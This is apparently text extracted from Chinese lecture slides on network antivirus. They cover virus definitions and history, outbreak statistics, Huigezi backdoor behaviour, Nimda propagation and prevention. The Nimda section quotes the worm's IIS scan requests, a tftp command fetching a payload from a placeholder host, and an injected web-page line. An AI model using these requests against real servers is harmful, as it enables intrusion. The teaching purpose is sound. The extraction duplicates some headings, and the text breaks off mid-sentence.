chapter3網(wǎng)絡(luò)防病毒

1、第三章第三章 網(wǎng)絡(luò)防病毒網(wǎng)絡(luò)防病毒深職院 計算機(jī)網(wǎng)絡(luò)技術(shù)專業(yè)池瑞楠本章主要內(nèi)容Key Questions 計算機(jī)病毒的定義 病毒發(fā)展史 計算機(jī)病毒的特點(diǎn) 病毒分類 計算機(jī)病毒的發(fā)展趨勢 病毒實(shí)例 病毒的防護(hù)網(wǎng)絡(luò)安全防護(hù)體系構(gòu)架網(wǎng)絡(luò)安全防護(hù)體系構(gòu)架網(wǎng)絡(luò)安全評估安全防護(hù)網(wǎng)絡(luò)安全服務(wù)系統(tǒng)漏洞掃描網(wǎng)絡(luò)管理評估病毒防護(hù)體系網(wǎng)絡(luò)監(jiān)控數(shù)據(jù)保密網(wǎng)絡(luò)訪問控制應(yīng)急服務(wù)體系安全技術(shù)培訓(xùn)數(shù)據(jù)恢復(fù)一、計算機(jī)病毒的定義 1994年2月18日，我國正式頒布實(shí)施了中華人民共和國計算機(jī)信息系統(tǒng)安全保護(hù)條例，在條例第二十八條中明確指出：“計算機(jī)病毒，指編制或者在計算機(jī)程序中插入的破壞計算機(jī)功能或者破壞數(shù)據(jù)破壞計算機(jī)功能或者破壞數(shù)

2、據(jù)，影響計算機(jī)使用并且能夠自我復(fù)制能夠自我復(fù)制 的一組計算機(jī)一組計算機(jī)指令或者程序代碼指令或者程序代碼 ”。 病毒：Virus二、計算機(jī)病毒的發(fā)展史 1、計算機(jī)病毒的產(chǎn)生的思想基礎(chǔ)和病毒發(fā)展簡介 2、實(shí)驗(yàn)室中產(chǎn)生病毒的祖先（磁芯大戰(zhàn)） 3、計算機(jī)病毒的出現(xiàn)（1983年） 4、我國計算機(jī)病毒的出現(xiàn) （1989年）病毒的產(chǎn)生原因n（1）編制人員出于一種炫耀和顯示自己能力的目的n（2）某些軟件作者出于版權(quán)保護(hù)的目的而編制 n（3）出于某種報復(fù)目的或惡作劇而編寫病毒 n（4）出于政治、戰(zhàn)爭的需要計算機(jī)病毒的發(fā)展歷程 1. DOS引導(dǎo)階段 2. DOS可執(zhí)行階段 3. 伴隨階段 4. 多形階段 5. 生

3、成器、變體機(jī)階段 6. 網(wǎng)絡(luò)、蠕蟲階段 7. 視窗階段 8. 宏病毒階段 9. 郵件病毒階段 10. 手持移動設(shè)備病毒階段 時代劃分時間總結(jié)第一代：傳統(tǒng)病毒1986-1989DOS引導(dǎo)階段DOS可執(zhí)行階段第二代：混合病毒(超級病毒)1989-1991伴隨、批次型階段第三代：多態(tài)性病毒1992-1995幽靈、多形階段生成器、變體機(jī)階段第四代：90年代中后宏病毒階段網(wǎng)絡(luò)、蠕蟲階段典型的計算機(jī)病毒事件時間名稱事件1986Brain 第一個病毒（軟盤引導(dǎo)）1987黑色星期五病毒第一大規(guī)模爆發(fā)1988.11.2蠕蟲病毒 第一個蠕蟲計算機(jī)病毒 1990.1“4096”發(fā)現(xiàn)首例隱蔽型病毒，破壞數(shù)據(jù)1991

4、病毒攻擊應(yīng)用于戰(zhàn)爭 1991米開朗基羅第一個格式化硬盤的開機(jī)型病毒1992VCL- Virus Creation Laboratory病毒生產(chǎn)工具在美國傳播時間名稱事件1992年9月首例Windows病毒1995FAT病毒、幽靈、變形金剛多態(tài)性（基于）windows）1997宏病毒 傳播方式增加（郵件等）1999CIH發(fā)現(xiàn)破壞計算機(jī)硬件病毒1999 Mellisahappy99郵件病毒2000紅色代碼黑客型病毒2001Nimda集中了所有蠕蟲傳播途徑2002SQLSPIDA.B第一個攻擊SQL服務(wù)器2003SQL_slammer利用SQL server數(shù)據(jù)庫的漏洞2003.8.11沖擊波集中了

5、所有蠕蟲傳播途徑2006年十大病毒 2006年出現(xiàn)的新病毒數(shù)量急劇增加，達(dá)到234211個，幾乎等于以往所有病毒數(shù)量的總和。 這些新病毒，90%以上帶有明顯的利益特征，有竊取個人資料、各種賬號密碼等行為。其中，竊取用戶賬號密碼等個人虛擬財產(chǎn)信息的病毒共167387個，占到總病毒數(shù)量的71.47%。這一年，中國還出現(xiàn)了首個勒索病毒“進(jìn)程殺手變種”。2006年十大病毒序序號號病毒中文名累計感染計算機(jī) 類型類型感染系統(tǒng)感染系統(tǒng)1“熊貓燒香” 蠕蟲Win2000/XP2威金蠕蟲 446450蠕蟲Win9X/2000/XP/NT/Me/20033傳奇竊賊 739169 木馬Win9X/2000/XP/N

6、T/Me/20034敲詐者 木馬Win9X/2000/XP/NT/Me/20035QQ盜號木馬 615901 木馬Win9X/2000/XP/NT/Me/20036齷齪蟲 20351 蠕蟲Win9X/2000/XP/NT/Me7灰鴿子后門 897592 木馬Win9X/2000/XP/NT/Me8工行釣魚木馬 42838木馬Windows 2000、Windows XP9征途木馬變種木馬Win9X/2000/XP/NT/Me10調(diào)用門Rootkit Win3X/9X/2000/XP/NT/Me/2003近年新增病毒數(shù)量對比2007年各類病毒/木馬比例2007年十大病毒/木馬數(shù)據(jù)來源：金山軟件發(fā)

7、布的數(shù)據(jù)來源：金山軟件發(fā)布的2007年度中國電腦病毒疫情及互聯(lián)網(wǎng)安全年度中國電腦病毒疫情及互聯(lián)網(wǎng)安全報告報告（2008/1/17）2008年上半年病毒數(shù)量2008年度上半年十大病毒排行 FROM：江民科技 2008年上半年病毒種類分析計算機(jī)病毒的危害 1、計算機(jī)病毒造成巨大的社會經(jīng)濟(jì)損失 2、影響政府職能部門正常工作的開展 3、計算機(jī)病毒被賦予越來越多的政治意義 4、利用計算機(jī)病毒犯罪現(xiàn)象越來越嚴(yán)重病毒帶來的威脅三、計算機(jī)病毒的特征 傳染性 破壞性 潛伏性和可觸發(fā)性 非授權(quán)性 隱藏性 不可預(yù)見性病毒名：Backdoor/Huigezi.2005（灰鴿子2005） 1.病毒運(yùn)行后，將創(chuàng)建下列文件

8、(安全模式下查看)： %WinDir%IExplorer.exe，病毒程序 %WinDir%IExplorer.dll, 病毒程序 %WinDir%IExplorer_Hook.dll, 病毒程序 2.通過修改如下注冊表項(xiàng)，將病毒自身添加為服務(wù) HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesPower supply management 3.將IExplorer_Hook.dll注入到系統(tǒng)每個進(jìn)程中，通過hook系統(tǒng)函數(shù)來達(dá)到隱藏自身的目的。 (1)隱藏病毒自身進(jìn)程，通過任務(wù)管理器無法查找到病毒進(jìn)程。 (2)隱藏病毒自身文件，正常模式下查看不

9、到病毒文件。 (3)隱藏自身添加的服務(wù)，使自己從服務(wù)列表中消失。 四、計算機(jī)病毒有哪些種類？依據(jù)不同的分類標(biāo)準(zhǔn)，計算機(jī)病毒可以做不同的歸類。常見的分類標(biāo)準(zhǔn)有：1. 根據(jù)病毒依附的操作系統(tǒng)2. 根據(jù)病毒的傳播媒介3. 根據(jù)病毒的傳染途徑病毒攻擊的操作系統(tǒng) Microsoft DOS Microsoft Windows 95/98/ME Microsoft Windows NT/2000/XP Unix(Linux) 其他操作系統(tǒng)病毒攻擊的操作系統(tǒng)圖例(數(shù)據(jù)來源于瑞星病毒樣本庫)DOSDOS43%43%UnixUnix3%3%OtherOther1%1%WindowWindows s53%53%D

10、OSDOSWindowsWindowsUnixUnixOtherOther病毒的傳播媒介存儲介質(zhì)網(wǎng)絡(luò)1. 郵件(SoBig)2. 網(wǎng)頁(RedLof)3. 局域網(wǎng)(Funlove)4. 遠(yuǎn)程攻擊(Blaster)5. 網(wǎng)絡(luò)下載病毒網(wǎng)絡(luò)傳播方式圖例(數(shù)據(jù)來源于瑞星病毒樣本庫)郵件郵件47%47%局域網(wǎng)局域網(wǎng)9%9%遠(yuǎn)程攻遠(yuǎn)程攻擊擊4%4%網(wǎng)頁網(wǎng)頁40%郵件郵件網(wǎng)頁網(wǎng)頁局域網(wǎng)局域網(wǎng)遠(yuǎn)程攻擊遠(yuǎn)程攻擊病毒的傳播和感染對象感染引導(dǎo)區(qū)感染文件可執(zhí)行文件OFFICE宏網(wǎng)頁腳本（ Java小程序和ActiveX控件）網(wǎng)絡(luò)蠕蟲網(wǎng)絡(luò)木馬破壞程序其他惡意程序病毒演示病毒演示病毒演示CIH病毒病毒病毒演示彩帶病毒病毒

11、演示女鬼病毒病毒演示千年老妖病毒演示圣誕節(jié)病毒病毒演示白雪公主巨大的黑白螺旋占據(jù)了屏幕位置，使計算機(jī)使用者無法進(jìn)行任何操作！紅色代碼 1() 病毒發(fā)作現(xiàn)象病毒發(fā)作現(xiàn)象引導(dǎo)型病毒 文件型病毒 文件型病毒的特點(diǎn)是附著于正常程序文件，成為程序文件的一個外殼或部件。 文件型病毒主要以感染文件擴(kuò)展名為.com、.exe和.bat等可執(zhí)行程序?yàn)橹鳌?大多數(shù)的文件型病毒都會把它們自己的代碼復(fù)制到其宿主文件的開頭或結(jié)尾處。 計算機(jī)病毒引起是異常情況 計算機(jī)系統(tǒng)運(yùn)行速度明顯降低 系統(tǒng)容易死機(jī) 文件改變、破壞 磁盤空間迅速減少 內(nèi)存不足 系統(tǒng)異常頻繁重

12、啟動 頻繁產(chǎn)生錯誤信息常見DOS病毒分析1引導(dǎo)記錄病毒 （1）引導(dǎo)型病毒的傳播、破壞過程 （2）引導(dǎo)型病毒實(shí)例：小球病毒 2文件型病毒（1）文件型病毒的類型 （2）文件型病毒的感染方式 （3）.COM文件的感染 （4）.EXE文件的感染 （5）.SYS文件的感染 宏病毒的行為和特征 宏病毒是一種新形態(tài)的計算機(jī)病毒，也是一種跨平臺式計算機(jī)病毒。可以在Windows、Windows 95/98/NT、OS/2、Macintosh 等操作系統(tǒng)上執(zhí)行病毒行為。 宏病毒的主要特征如下： 1）宏病毒會感染.DOC文檔和.DOT模板文件。 2）宏病毒的傳染通常是Word在打開一個帶宏病毒的文檔或模板時，激活

13、宏病毒。 3）多數(shù)宏病毒包含AutoOpen、AutoClose、AutoNew和AutoExit等自動宏，通過這些自動宏病毒取得文檔（模板）操作權(quán)。 4）宏病毒中總是含有對文檔讀寫操作的宏命令。5）宏病毒在.DOC文檔、.DOT模板中以BFF（Binary File Format）格式存放，這是一種加密壓縮格式，每個Word版本格式可能不兼容。6）宏病毒具有兼容性。 宏病毒的特點(diǎn) 1傳播極快 2制作、變種方便 3破壞可能性極大宏病毒的防治和清除方法Word宏病毒，是近年來被人們談?wù)摰米疃嗟囊环N計算機(jī)病毒。與那些用復(fù)雜的計算機(jī)編程語言編制的病毒相比，宏病毒的防治要容易得多！在了解了Word宏病

14、毒的編制、發(fā)作過程之后，即使是普通的計算機(jī)用戶，不借助任何殺毒軟件，就可以較好地對其進(jìn)行防冶。 1. 查看“可疑”的宏 2按使用習(xí)慣編制宏 3防備Autoxxxx宏 4小心使用外來的Word文檔 5使用選項(xiàng)“Prompt to Save Normal Template” （工具-選項(xiàng)-保存）6查看宏代碼并刪除 7. 將文檔存儲為RTF格式 8設(shè)置Normal.dot的只讀屬性 9 Normal.dot的密碼保護(hù) 10使用OFFICE 的報警設(shè)置 網(wǎng)絡(luò)化病毒的特點(diǎn) 網(wǎng)絡(luò)化：傳播速度快、爆發(fā)速度快、面廣 隱蔽化：具有欺騙性（加密） 多平臺、多種語言 新方式：與黑客、特洛伊木馬相結(jié)合 多途徑： 攻擊

15、反病毒軟件 變化快（變種） 清除難度大 破壞性強(qiáng) 蠕蟲病毒 通過網(wǎng)絡(luò)傳播的惡性病毒,它具有病毒的一些共性,如傳播性,隱蔽性,破壞性等等,同時具有自己的一些特征，如不利用文件寄生（有的只存在于內(nèi)存中）,對網(wǎng)絡(luò)造成拒絕服務(wù)，以及和黑客技術(shù)相結(jié)合等等。蠕蟲病毒與其他病毒的區(qū)別普通病毒蠕蟲病毒存在形式 寄存文件獨(dú)立程序傳染機(jī)制宿主程序運(yùn)行主動攻擊傳染目標(biāo)本地文件網(wǎng)絡(luò)計算機(jī)蠕蟲病毒的特點(diǎn) 破壞性強(qiáng) 傳染方式多 一種是針對企業(yè)的局域網(wǎng)，主要通過系統(tǒng)漏洞；另外一種是針對個人用戶的, 主要通過電子郵件,惡意網(wǎng)頁形式迅速傳播的蠕蟲病毒。 傳播速度快 清除難度大實(shí)例：2003蠕蟲王 病毒實(shí)例Nimda及解決方案感

16、染 Win 95/98/NT/2000 系統(tǒng)1.通過email 在internet臨時文件夾中讀取所有htm， h t m l 文 件 并 從 中 提 取 e m a i l 地 址 ，從信箱讀取email并從中提取SMTP服務(wù)器，然后發(fā)送readme.eml。NimdaNimda-2.利用 IIS、IE 的安全漏洞 CodeRedII會在IIS的幾個可執(zhí)行目錄下放置root.exeNimda首先在udp/69上啟動一個tftp服務(wù)器然后會作以下掃描： GET /scripts/root.exe?/c+dir HTTP/1.0GET /MSADC/root.exe?/c+dir HTTP/1.

17、0GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0一 旦 發(fā) 現(xiàn) 有 弱 點(diǎn) 的 系 統(tǒng) 就 使 用 類 似 下 面 的 命 令GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx G E T A d m i n . d l l H T T P / 1 . 0把文件傳到主機(jī)上去，然后再GET /scripts/Admin.dll HTTP/1.0NimdaNimda- - 3.通過WWW服務(wù) 在所有文件名中包含defau

18、lt/index/main/readme并且擴(kuò)展名為htm/html/asp的文件所在目錄中創(chuàng)建readme.eml，并在文件末加上下面這一行window.open(readme.eml, null, resizable=no,top=6000,left=6000)也就是說如果一臺web服務(wù)器被感染了，那么大部分訪問過此服務(wù)器的機(jī)器都會被感染。 NimdaNimda- - 4.通過局域網(wǎng)的共享 Nimda會搜索本地的共享目錄中包含doc文件的目錄，一但找到，就會把自身復(fù)制到目錄中命名為riched20.dll 病毒實(shí)例Nimda及解決方案首先對網(wǎng)絡(luò)中的工作站進(jìn)行全面清查對已感染的工作站進(jìn)行徹底

19、的殺毒，然后對已染毒的服務(wù)器殺毒以保證整個網(wǎng)絡(luò)系統(tǒng)是干凈的；對網(wǎng)絡(luò)中的服務(wù)器及工作站進(jìn)行軟件升級等一系列后續(xù)工程，杜絕再次染毒打微軟IIS、IE的補(bǔ)丁最后著重對服務(wù)器進(jìn)行本地安全策略的設(shè)置，做好防范工作，做到即使服務(wù)器再次中毒也不能影響整個服務(wù)器的正常工作及整個網(wǎng)絡(luò)系統(tǒng)的正常運(yùn)轉(zhuǎn)。反病毒技術(shù)簡述計算機(jī)病毒診斷技術(shù)計算機(jī)病毒診斷技術(shù) 1特征代碼法 2校驗(yàn)和法 3行為監(jiān)測法 4軟件模擬法五、病毒的預(yù)防措施 安裝防病毒軟件 定期升級防病毒軟件 不隨便打開不明來源 的郵件附件 盡量減少其他人使用你的計算機(jī) 及時打系統(tǒng)補(bǔ)丁 從外面獲取數(shù)據(jù)先檢察 建立系統(tǒng)恢復(fù)盤 定期備份文件 綜合各種防病毒技術(shù)STOP!服務(wù)器端防毒客戶端防毒防毒防毒集中管理器集中管理器STOP!STOP!Mail ServerSTOP!全方位的網(wǎng)絡(luò)病毒防護(hù)體系STOP!Meb Server File ServerSTOP!網(wǎng)絡(luò)病毒的特點(diǎn)及傳播方式網(wǎng)絡(luò)病毒的特點(diǎn) 網(wǎng)絡(luò)病毒的傳播方式 v 全網(wǎng)統(tǒng)一配置防毒策略。v 全網(wǎng)統(tǒng)一查殺病毒,沒有死角。v 全網(wǎng)統(tǒng)一升級版本統(tǒng)一。v 全網(wǎng)防毒狀況一目了然。v 跨平臺技術(shù)，全方位防病毒v 全網(wǎng)防毒工作輕松簡單：自動安裝、自動維護(hù)、自動更新單機(jī)版與網(wǎng)絡(luò)版的區(qū)別單機(jī)防毒網(wǎng)絡(luò)防毒網(wǎng)絡(luò)防毒選擇防毒軟件的標(biāo)準(zhǔn) “高偵測率